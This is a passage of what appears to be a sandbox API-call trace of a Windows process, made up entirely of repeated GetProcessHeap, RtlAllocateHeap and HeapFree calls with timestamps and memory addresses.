0xe30000 [0130.885] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.885] GetProcessHeap () returned 0xe30000 [0130.885] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.886] GetProcessHeap () returned 0xe30000 [0130.886] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.886] GetProcessHeap () returned 0xe30000 [0130.887] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.887] GetProcessHeap () returned 0xe30000 [0130.887] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.887] GetProcessHeap () returned 0xe30000 [0130.888] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.888] GetProcessHeap () returned 0xe30000 [0130.888] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.889] GetProcessHeap () returned 0xe30000 [0130.889] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.889] GetProcessHeap () returned 0xe30000 [0130.889] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.889] GetProcessHeap () returned 0xe30000 [0130.889] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0130.889] GetProcessHeap () returned 0xe30000 [0130.889] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0130.889] GetProcessHeap () returned 0xe30000 [0130.889] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.889] GetProcessHeap () returned 0xe30000 [0130.889] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.889] GetProcessHeap () returned 0xe30000 [0130.889] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.889] GetProcessHeap () returned 0xe30000 [0130.889] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.889] GetProcessHeap () returned 0xe30000 [0130.889] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.889] GetProcessHeap () returned 0xe30000 [0130.889] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.889] GetProcessHeap () returned 0xe30000 [0130.889] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.890] GetProcessHeap () returned 0xe30000 [0130.890] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.890] GetProcessHeap () returned 0xe30000 [0130.890] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.890] GetProcessHeap () returned 0xe30000 [0130.890] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.890] GetProcessHeap () returned 0xe30000 [0130.890] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.890] GetProcessHeap () returned 0xe30000 [0130.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.891] GetProcessHeap () returned 0xe30000 [0130.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.892] GetProcessHeap () returned 0xe30000 [0130.892] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.893] GetProcessHeap () returned 0xe30000 [0130.893] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.894] GetProcessHeap () returned 0xe30000 [0130.894] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.894] GetProcessHeap () returned 0xe30000 [0130.895] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.895] GetProcessHeap () returned 0xe30000 [0130.895] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.895] GetProcessHeap () returned 0xe30000 [0130.896] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.896] GetProcessHeap () returned 0xe30000 [0130.896] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.896] GetProcessHeap () returned 0xe30000 [0130.897] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0130.897] GetProcessHeap () returned 0xe30000 [0130.897] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: 